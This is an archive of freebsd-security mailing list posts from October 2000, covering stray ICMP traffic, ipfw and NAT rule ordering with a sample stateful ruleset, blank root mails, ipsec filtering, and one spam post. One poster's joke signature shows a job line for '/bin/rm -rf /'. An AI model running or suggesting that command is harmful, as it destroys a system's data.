From owner-freebsd-security Sun Oct 22 17:25: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.brandx.net (unknown [209.55.64.31]) by hub.freebsd.org (Postfix) with ESMTP id CFED437B4D7 for ; Sun, 22 Oct 2000 17:25:04 -0700 (PDT) Received: from as.tksoft.com (gyw.com [209.55.67.177] (may be forged)) by mail.brandx.net (8.10.2/8.10.2) with ESMTP id e9M7e3i02608 for ; Sun, 22 Oct 2000 00:40:03 -0700 Received: from uno.tksoft.com (smtp3.tksoft.com [192.168.50.56] (may be forged)) by as.tksoft.com (8.8.8/8.8.8) with ESMTP id CAA19592; Sat, 21 Oct 2000 02:39:58 -0700 Received: (from tjk@tksoft.com) by uno.tksoft.com (8.8.8/8.8.8) id CAA08156; Sat, 21 Oct 2000 02:06:37 -0700 From: "tjk@tksoft.com" Message-Id: <200010210906.CAA08156@uno.tksoft.com> Subject: Re: Unexpected ICMP messages - is someone spoofing my subnet? To: mlnn4@oaks.com.au Date: Sat, 21 Oct 2000 02:06:34 -0700 (PDT) Cc: freebsd-security@FreeBSD.org In-Reply-To: <007701c03b26$10c42560$023a1dac@dsat.net.au> from "Chris" at Oct 21, 2000 05:13:40 PM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Chris, Contact the admins of the hosts where the packets are coming from. Then determine what kind of queries the host unreached's are generated for. That's your best bet for finding out the facts. Troy > > Recently I have noticed a lot of attention being paid (attempted TCP > connections at port 137) to a particular IP address inside my class C > subnet. This was over and above the normal subnet scans I get to the > entire range. > > I have had this subnet for about four years and have never at any time > had anything at that IP address. > > So, I modified my ipfw setup to log any IP data that come in for any > unused address (in the past I tended to ignore ICMP at those addresses > without logging). What I have seen surprises and to an extent perplexes > me, so I'm writing to see if there is a rational explanation for it. > > Basically, I am getting perhaps 50 or 100 ICMP messages per day for a > number (more than 30) of IP addresses that have never at any time been > used by me. I am not referring to echo requests - those I could under- > stand. These messages are typically either 'destination unreachable' or > occasionally 'time exceeded' (almost always the former). > > The senders vary widely but tend to come in groups ; that is, I'll get > a batch of ICMP messages from a single host (or two closely related > hosts) that are sent to a number of different IP addresses within my > net, usually within a short time span. > > I have verified that nothing is going out of my network using those IP > addresses. > > Given that 'host unreachable' messages imply that the remote system in > question has received a packet from one of my IP addresses, which it > rejected and then attempted to tell me about, it would seem that either > someone is spoofing my subnet, or someone is using my subnet internally > even though it's not assigned to them. > > In that case, I'd expect to see OTHER data coming in to it - but to a > great extent I don't (apart from the normal probes that we all seem to > get from script kiddiez). Additionally, I don't see what benefit that > someone would gain from spoofing my subnet unless they had the ability > to grab the data being routed back or they're performing DOS attacks. > In the former case I would not expect to receive any ICMP at all, and > in the latter, I'd expect to see a lot more data than what I have seen. > > Has anyone got any particular suggestions as to either the cause of this, > and/or as to how I may get to the bottom of it ? > > regards, > > -- Chris > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 23 8:56:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd.org (cts2161208053.cts.com [216.120.80.53]) by hub.freebsd.org (Postfix) with SMTP id 23F6B37B4CF for ; Mon, 23 Oct 2000 08:56:33 -0700 (PDT) From: "third try" Date: Mon, 23 Oct 2000 08:57:30 X-Mailer: Prospect Mailer 2000 To: freebsd-security@freebsd.org Subject: Hey, check out this band! MIME-Version: 1.0 Content-Type: text/plain;charset="iso-8859-1" Content-Transfer-Encoding: 7bit Message-Id: <20001023155633.23F6B37B4CF@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, we are third try. I guess you could call us pop-punk. Anyways, we are writing you because we heard that you like bands like us, and we wanted you to visit our website: http://www.thirdtry.com. On thirdtry.com you can find FREE MP3s of our music, so you can see for yourself how great we really are. Thank you for your time. Sincerely Yours, third try PS: Also, while you are there, check out how you can help us win the Ernie Ball battle of the bands and win a cool purple glitter guitar! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 23 14: 3:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from tomts7-srv.bellnexxia.net (tomts7.bellnexxia.net [209.226.175.40]) by hub.freebsd.org (Postfix) with ESMTP id 79F0D37B4C5 for ; Mon, 23 Oct 2000 14:03:20 -0700 (PDT) Received: from idem.felixantoine.com ([64.229.235.70]) by tomts7-srv.bellnexxia.net (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001023210314.KRXA1583.tomts7-srv.bellnexxia.net@idem.felixantoine.com> for ; Mon, 23 Oct 2000 17:03:14 -0400 Message-Id: <5.0.0.25.0.20001023170234.009ea0d0@pop6.sympatico.ca> X-Sender: b1gbfv75@pop6.sympatico.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Mon, 23 Oct 2000 17:03:50 -0400 To: freebsd-security@freebsd.org From: =?iso-8859-1?Q?F=E9lix-Antoine?= Paradis Subject: test Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org test? NO TEST. The mailing list is working fine. When you send a message,=20 it's *NOT* sent back to you. Thank's... (and that was not a rude message.) F=E9lix-Antoine Paradis ---------------------------------------------------------------- Idem Private Network, Administrator. Ozyx Technologies, COO. --------------------------------------------------------------- Also known as reel on the DALnet IRC Network. (irc.dal.net) --------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 23 14: 7: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from tomts7-srv.bellnexxia.net (tomts7.bellnexxia.net [209.226.175.40]) by hub.freebsd.org (Postfix) with ESMTP id 6577337B4E5 for ; Mon, 23 Oct 2000 14:06:53 -0700 (PDT) Received: from idem.felixantoine.com ([64.229.235.70]) by tomts7-srv.bellnexxia.net (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001023210652.KSTF1583.tomts7-srv.bellnexxia.net@idem.felixantoine.com> for ; Mon, 23 Oct 2000 17:06:52 -0400 Message-Id: <5.0.0.25.0.20001023170601.009f1df0@pop6.sympatico.ca> X-Sender: b1gbfv75@pop6.sympatico.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0 Date: Mon, 23 Oct 2000 17:07:27 -0400 To: freebsd-security@freebsd.org From: =?iso-8859-1?Q?F=E9lix-Antoine?= Paradis Subject: Re: test In-Reply-To: <5.0.0.25.0.20001023170234.009ea0d0@pop6.sympatico.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org well, it is ;>~ sorry (dalnet's don't) However, stop testing, it's just a bunch of unnecessary messages. (like this one) At 17:03 23/10/00 -0400, you wrote: >test? NO TEST. The mailing list is working fine. When you send a message,= =20 >it's *NOT* sent back to you. > >Thank's... > >(and that was not a rude message.) > >F=E9lix-Antoine Paradis >---------------------------------------------------------------- >Idem Private Network, Administrator. >Ozyx Technologies, COO. >--------------------------------------------------------------- >Also known as reel on the DALnet >IRC Network. (irc.dal.net) >--------------------------------------------------------------- > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message F=E9lix-Antoine Paradis ---------------------------------------------------------------- Idem Private Network, Administrator. Ozyx Technologies, COO. --------------------------------------------------------------- Also known as reel on the DALnet IRC Network. (irc.dal.net) --------------------------------------------------------------- In God we Trust -- all others must submit an X.509 certificate. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 14: 7:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from virtual.sysadmin-inc.com (lists.sysadmin-inc.com [209.16.228.140]) by hub.freebsd.org (Postfix) with ESMTP id 6A24237B479; Tue, 24 Oct 2000 14:07:16 -0700 (PDT) Received: from 98wkst ([10.10.1.71]) by virtual.sysadmin-inc.com (8.9.1/8.9.1) with SMTP id RAA06331; Tue, 24 Oct 2000 17:07:48 -0400 Reply-To: From: "Peter Brezny" To: Subject: request for example rc.firewall script Date: Tue, 24 Oct 2000 17:07:24 -0400 Message-ID: <003401c03dfe$68b42d80$47010a0a@fire.sysadmininc.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm working on adding the rules needed to rc.firewall under the 'simple' sections to allow the script to function as a firewall/nat router for a small network with private ip's in the 10.x.x.x range. The firewall works if i use a simplified script, but the standard rc.firewall that comes with 4.1 doesn't appear to allow nat to work without modifying the rc.firewall script more than just putting in your network info. i think i need some allow rules before the # Stop RFC1918 nets on the outside inteface section of the script. If anyone would be willing to share a portion of their rc.firewall script I'd really appreciate it. Peter Brezny SysAdmin Services, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 14:11: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from pfa0frpk001.panasonicfa.com (unknown [38.248.119.1]) by hub.freebsd.org (Postfix) with ESMTP id BE5AC37B479 for ; Tue, 24 Oct 2000 14:11:06 -0700 (PDT) Received: by exchange.panasonicfa.com with Internet Mail Service (5.5.2650.21) id ; Tue, 24 Oct 2000 16:10:47 -0500 Message-ID: <054F7DAA9E54D311AD090008C74CE9BD01766CC7@exchange.panasonicfa.com> From: "Zaitsau, Andrei" To: "'peter@sysadmin-inc.com'" Cc: "'freebsd-security@freebsd.org'" Subject: RE: request for example rc.firewall script Date: Tue, 24 Oct 2000 16:10:46 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have exactly the same problem with rc.firewall, it's blocking me from using NAT. Peter, if someone is going to send you rc.firewall script, can you also forward it to me? ;) Thanks. Andrei. -----Original Message----- From: Peter Brezny [mailto:peter@sysadmin-inc.com] Sent: Tuesday, October 24, 2000 4:07 PM To: freebsd-security@freebsd.org Subject: request for example rc.firewall script I'm working on adding the rules needed to rc.firewall under the 'simple' sections to allow the script to function as a firewall/nat router for a small network with private ip's in the 10.x.x.x range. The firewall works if i use a simplified script, but the standard rc.firewall that comes with 4.1 doesn't appear to allow nat to work without modifying the rc.firewall script more than just putting in your network info. i think i need some allow rules before the # Stop RFC1918 nets on the outside inteface section of the script. If anyone would be willing to share a portion of their rc.firewall script I'd really appreciate it. Peter Brezny SysAdmin Services, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-net" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 15:39:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from www.kpi.com.au (www.kpi.com.au [203.39.132.210]) by hub.freebsd.org (Postfix) with ESMTP id 862D337B4C5 for ; Tue, 24 Oct 2000 15:39:06 -0700 (PDT) Received: from kpi.com.au (lurker.kpi.com.au [203.39.132.222]) by www.kpi.com.au (8.9.3/8.9.3) with ESMTP id JAA37816; Wed, 25 Oct 2000 09:43:03 +1100 (EST) (envelope-from johnsa@kpi.com.au) Message-ID: <39F6110F.E8B461CA@kpi.com.au> Date: Wed, 25 Oct 2000 09:45:35 +1100 From: Andrew Johns Organization: KPI Logistics X-Mailer: Mozilla 4.75 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: peter@sysadmin-inc.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: request for example rc.firewall script References: <003401c03dfe$68b42d80$47010a0a@fire.sysadmininc.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Brezny wrote: > I'm working on adding the rules needed to rc.firewall under the 'simple' > sections to allow the script to function as a firewall/nat router for a > small network with private ip's in the 10.x.x.x range. > > The firewall works if i use a simplified script, but the standard > rc.firewall that comes with 4.1 doesn't appear to allow nat to work without > modifying the rc.firewall script more than just putting in your network > info. Correct. > > > i think i need some allow rules before the > > # Stop RFC1918 nets on the outside inteface > > section of the script. > Absolutely, or else after the divert rule, the packet is (optionally) re-injected back into the ruleset at the next rule, where it eventually hits the RFC1918 deny's and gets dropped. Several methods are available: a) Move the RFC1918 deny's in front of the divert rule, which is what you generally want anyway - stopping idiots upstream from you sending packets with those addresses from misconfigured machines. b) Forget the RFC1918 deny's and only allow specific target IP/ports through and explicitly deny everything else. These are just two ideas. tcpdump is most useful in diagnosing these issues, as you'll see the SRC and DST IP/port packets and you can watch the deny logs on the console (or wherever you're sending them) - this assumes that you've got 'deny log' rules of course. HTH AJ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 17:26:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from ebola.biohz.net (ebola.biohz.net [206.80.1.35]) by hub.freebsd.org (Postfix) with ESMTP id 390E937B4C5 for ; Tue, 24 Oct 2000 17:26:16 -0700 (PDT) Received: from flu (localhost [127.0.0.1]) by ebola.biohz.net (Postfix) with SMTP id A3B523A2A6; Tue, 24 Oct 2000 17:26:10 -0700 (PDT) Message-ID: <022201c03e1a$2cc73b20$0402010a@biohz.net> From: "Renaud Waldura" To: , References: <003401c03dfe$68b42d80$47010a0a@fire.sysadmininc.com> Subject: Re: request for example rc.firewall script Date: Tue, 24 Oct 2000 17:26:10 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Check these out: http://renaud.waldura.com/doc/freebsd-firewall/ http://renaud.waldura.com/sw/freebsd-firewall/ ----- Original Message ----- From: Peter Brezny To: Sent: Tuesday, October 24, 2000 2:07 PM Subject: request for example rc.firewall script > I'm working on adding the rules needed to rc.firewall under the 'simple' > sections to allow the script to function as a firewall/nat router for a > small network with private ip's in the 10.x.x.x range. > > The firewall works if i use a simplified script, but the standard > rc.firewall that comes with 4.1 doesn't appear to allow nat to work without > modifying the rc.firewall script more than just putting in your network > info. > > i think i need some allow rules before the > > # Stop RFC1918 nets on the outside inteface > > section of the script. > > If anyone would be willing to share a portion of their rc.firewall script > I'd really appreciate it. > > Peter Brezny > SysAdmin Services, Inc. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-net" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 18:14:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from tfpmail.com (mach90.digitcom.net [209.73.80.91]) by hub.freebsd.org (Postfix) with ESMTP id CA3BA37B479; Tue, 24 Oct 2000 18:14:53 -0700 (PDT) Date: Tue, 24 Oct 2000 18:24:25 -0700 Message-Id: <200010241824.AA32899556@tfpmail.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: "Jonathan Slivko" Reply-To: X-Sender: To: , Subject: Is this a dead list? X-Mailer: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is this a dead list, or am I just missing posts? -- Jonathan M. Slivko. -- ---- Jonathan M. Slivko Systems Administrator, CoreSync Corparation Technical Support, Simple Hosting Solutions Voicemail/Pager: (888) 365-0000 x72601 ---- -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 18:46:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from workhorse.iMach.com (workhorse.iMach.com [206.127.77.89]) by hub.freebsd.org (Postfix) with ESMTP id 76E6637B479; Tue, 24 Oct 2000 18:46:17 -0700 (PDT) Received: from localhost (forrestc@localhost) by workhorse.iMach.com (8.9.3/8.9.3) with ESMTP id SAA01256; Tue, 24 Oct 2000 18:49:18 -0600 (MDT) Date: Tue, 24 Oct 2000 18:49:17 -0600 (MDT) From: "Forrest W. Christian" To: Jonathan Slivko Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Is this a dead list? In-Reply-To: <200010241824.AA32899556@tfpmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org freebsd-isp (at least) is alive and well.... On Tue, 24 Oct 2000, Jonathan Slivko wrote: > Date: Tue, 24 Oct 2000 18:24:25 -0700 > From: Jonathan Slivko > To: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG > Subject: Is this a dead list? > > Is this a dead list, or am I just missing posts? -- Jonathan M. Slivko. > > > > -- > ---- > Jonathan M. Slivko > Systems Administrator, CoreSync Corparation > Technical Support, Simple Hosting Solutions > Voicemail/Pager: (888) 365-0000 x72601 > ---- > -- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message > - Forrest W. Christian (forrestc@imach.com) AC7DE ---------------------------------------------------------------------- iMach, Ltd., P.O. Box 5749, Helena, MT 59604 http://www.imach.com Solutions for your high-tech problems. (406)-442-6648 ---------------------------------------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 20:49:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from snafu.adept.org (adsl-63-201-63-44.dsl.snfc21.pacbell.net [63.201.63.44]) by hub.freebsd.org (Postfix) with ESMTP id A83C837B479 for ; Tue, 24 Oct 2000 20:49:32 -0700 (PDT) Received: by snafu.adept.org (Postfix, from userid 65532) id 7190E9EE01; Tue, 24 Oct 2000 20:49:12 -0700 (PDT) From: "Mike Hoskins" To: Andrew Johns , peter@sysadmin-inc.com, freebsd-security@FreeBSD.ORG Subject: Re: request for example rc.firewall script X-Mailer: NeoMail 1.20pre3 X-IPAddress: 206.136.108.22 MIME-Version: 1.0 Message-Id: <20001025034912.7190E9EE01@snafu.adept.org> Date: Tue, 24 Oct 2000 20:49:12 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > b) Forget the RFC1918 deny's and only allow specific target IP/ports > through and explicitly deny everything else. My personal favorite, I.e.: check-state allow ip from a.b.c.d to any keep-state allow ip from x.y.z.z/24 to any keep-state allow tcp from NS1 to a.b.c.d 53 setup allow udp from NS1 to a.b.c.d 53 allow udp from a.b.c.d 53 to any allow tcp from any to a.b.c.d 25 setup allow tcp from any to a.b.c.d 22 in keep-state lifetime 3600 allow tcp from any to a.b.c.d 80 setup allow tcp from any to a.b.c.d 443 setup allow tcp from NTP to a.b.c.d 123 setup allow udp from NTP to a.b.c.d 123 Note: a.b.c.d == outside IP x.y.z.z == internal network NS1 == primary nameserver's IP NTP == NTP server's IP This builds dynamic rules for internal hosts and allows access to tcp/udp 53 from our upstream nameserver, DNS queries to the world, SMTP, SSH (setting timeout to 1 hour vs. default sysctl values thanks to Aaron Gifford's patches), HTTP, SSL, and NTP. This is certainly more of a custom firewall chain than a slight modification to rc.firewall's 'simple' configuration, but I'm usually anal enough I wouldn't feel comfortable any other way. ;) Also remember that this is just a quick example... read the man page for a more detailed understanding. -mrh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 21:38:57 2000 Delivered-To: freebsd-security@freebsd.org Received: from atlas.segfault.lan (drwho.xnet.com [205.243.140.183]) by hub.freebsd.org (Postfix) with ESMTP id AD7CD37B479 for ; Tue, 24 Oct 2000 21:38:52 -0700 (PDT) Received: from sun.segfault.lan (sun.segfault.lan [192.168.16.4]) by atlas.segfault.lan (8.11.1/8.11.1) with ESMTP id e9P4bWS13231 for ; Tue, 24 Oct 2000 23:37:32 -0500 (CDT) (envelope-from drwho@sun.segfault.lan) Received: (from drwho@localhost) by sun.segfault.lan (8.9.1b+Sun/8.9.1) id XAA02624 for freebsd-security@freebsd.org; Tue, 24 Oct 2000 23:38:53 -0500 (CDT) Date: Tue, 24 Oct 2000 23:38:52 -0500 From: Michael Maxwell To: freebsd-security@freebsd.org Subject: Empty mails from root Message-ID: <20001024233851.A2618@sun.segfault.lan> Mail-Followup-To: Michael Maxwell , freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I've noticed that since I upgraded from 3.5-STABLE to 4.1.1-STABLE a couple days ago, I have been receiving, along with the normal security- check mails and system info mails, a blank message from root. There is no subject line, no contents, etc... but it originates on the local host. Could someone please tell me what this is for and if it's normal? Or is this indicative of something else...? Thanks. -- Michael Maxwell | Unix Specialist - Solaris/BSD/SCO drwho @ xnet . com | "I'm not wearing any pants..." Film at eleven. [1] + 5934 done /bin/rm -rf / & To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 21:44: 6 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-c.mdsn1.wi.home.com [24.183.3.139]) by hub.freebsd.org (Postfix) with ESMTP id 3A25F37B479 for ; Tue, 24 Oct 2000 21:44:01 -0700 (PDT) Received: (qmail 12473 invoked by uid 1000); 25 Oct 2000 04:43:59 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 25 Oct 2000 04:43:59 -0000 Date: Tue, 24 Oct 2000 23:43:59 -0500 (CDT) From: Mike Silbersack To: Michael Maxwell Cc: freebsd-security@freebsd.org Subject: Re: Empty mails from root In-Reply-To: <20001024233851.A2618@sun.segfault.lan> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 24 Oct 2000, Michael Maxwell wrote: > Hi, > I've noticed that since I upgraded from 3.5-STABLE to 4.1.1-STABLE a > couple days ago, I have been receiving, along with the normal security- > check mails and system info mails, a blank message from root. There > is no subject line, no contents, etc... but it originates on the > local host. > > Could someone please tell me what this is for and if it's normal? Or > is this indicative of something else...? Did you mergemaster? The security run-related files changed a lot. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 24 22:43:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id AA62037B479 for ; Tue, 24 Oct 2000 22:43:34 -0700 (PDT) Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Tue, 24 Oct 2000 22:42:07 -0700 Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id e9P5hDm21895; Tue, 24 Oct 2000 22:43:13 -0700 (PDT) (envelope-from cjc) Date: Tue, 24 Oct 2000 22:43:13 -0700 From: "Crist J . Clark" To: Mike Hoskins Cc: Andrew Johns , peter@sysadmin-inc.com, freebsd-security@FreeBSD.ORG Subject: Re: request for example rc.firewall script Message-ID: <20001024224313.X75251@149.211.6.64.reflexcom.com> Reply-To: cjclark@alum.mit.edu References: <20001025034912.7190E9EE01@snafu.adept.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <20001025034912.7190E9EE01@snafu.adept.org>; from mike@adept.org on Tue, Oct 24, 2000 at 08:49:12PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Oct 24, 2000 at 08:49:12PM -0700, Mike Hoskins wrote: > > b) Forget the RFC1918 deny's and only allow specific target IP/ports > > through and explicitly deny everything else. > > My personal favorite, I.e.: > > check-state > allow ip from a.b.c.d to any keep-state > allow ip from x.y.z.z/24 to any keep-state Eep! You've left yourself _very_ vulnerable to spoofing. -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 1:38:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from snafu.adept.org (adsl-63-201-63-44.dsl.snfc21.pacbell.net [63.201.63.44]) by hub.freebsd.org (Postfix) with ESMTP id BEFAF37B479 for ; Wed, 25 Oct 2000 01:38:39 -0700 (PDT) Received: by snafu.adept.org (Postfix, from userid 1000) id 3FDA09EE01; Wed, 25 Oct 2000 01:38:19 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by snafu.adept.org (Postfix) with ESMTP id 3AE089B001; Wed, 25 Oct 2000 01:38:19 -0700 (PDT) Date: Wed, 25 Oct 2000 01:38:19 -0700 (PDT) From: Mike Hoskins To: cjclark@alum.mit.edu Cc: Andrew Johns , peter@sysadmin-inc.com, freebsd-security@FreeBSD.ORG Subject: Re: request for example rc.firewall script In-Reply-To: <20001024224313.X75251@149.211.6.64.reflexcom.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 24 Oct 2000, Crist J . Clark wrote: > > check-state > > allow ip from a.b.c.d to any keep-state > > allow ip from x.y.z.z/24 to any keep-state > Eep! You've left yourself _very_ vulnerable to spoofing. From the internal net you mean? If so, I agree. Given I'm the only person using my 'LAN', I've accepted that as a liveable risk. ;) Also, outbound ACL's on my router prevent spoofing without ipfw's intervention in my case... I do, however, agree that an additional 'layer' of security could and should be bought if this were a production firewall/router. -mrh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 5:43: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from gull.prod.itd.earthlink.net (gull.prod.itd.earthlink.net [207.217.121.85]) by hub.freebsd.org (Postfix) with ESMTP id AEF7B37B479; Wed, 25 Oct 2000 05:42:59 -0700 (PDT) Received: from veager.siteplus.net (1Cust143.tnt9.chattanooga.tn.da.uu.net [63.39.120.143]) by gull.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id FAA14458; Wed, 25 Oct 2000 05:42:53 -0700 (PDT) Date: Wed, 25 Oct 2000 08:42:52 -0400 (EDT) From: Jim Weeks To: Jonathan Slivko Cc: freebsd-isp@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: Is this a dead list? In-Reply-To: <200010241824.AA32899556@tfpmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 24 Oct 2000, Jonathan Slivko wrote: > Is this a dead list, or am I just missing posts? -- Jonathan M. Slivko. Strange you should ask this. I have noticed RE: posts lately without ever seeing the original post. I thought it might be something on my end but have been unable to find a problem. My mail server has been up continually since the last make world. I don't seem to be loosing other mail. Am I the only one that has noticed this? -- Jim Weeks To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 8:32:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.sovintel.ru (ns.sovintel.ru [212.44.130.6]) by hub.freebsd.org (Postfix) with ESMTP id 9A0DC37B479 for ; Wed, 25 Oct 2000 08:32:39 -0700 (PDT) Received: from anry (fw-nat.sovintel.net [212.44.130.15]) by ns.sovintel.ru (8.9.3/8.9.3) with ESMTP id TAA01889 for ; Wed, 25 Oct 2000 19:32:32 +0400 (MSD) Date: Wed, 25 Oct 2000 19:32:58 +0400 (MSD) From: Andrey Rouskol To: freebsd-security@freebsd.org Subject: ipsec and ipfw Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi ! I've found that in -current outgoing ipsec-packets (esp, ah) pass without been filtered by ipfw and incoming deencapsulated traffic is not filtered by ipfw too. So telnet connection over ipsec with statefull filtering is dropped in 20 seconds (which is dyn_syn_lifetime). All tests was made in 'transport' mode. Is this normal ? Regards, Andrey. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 25 9:41:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) 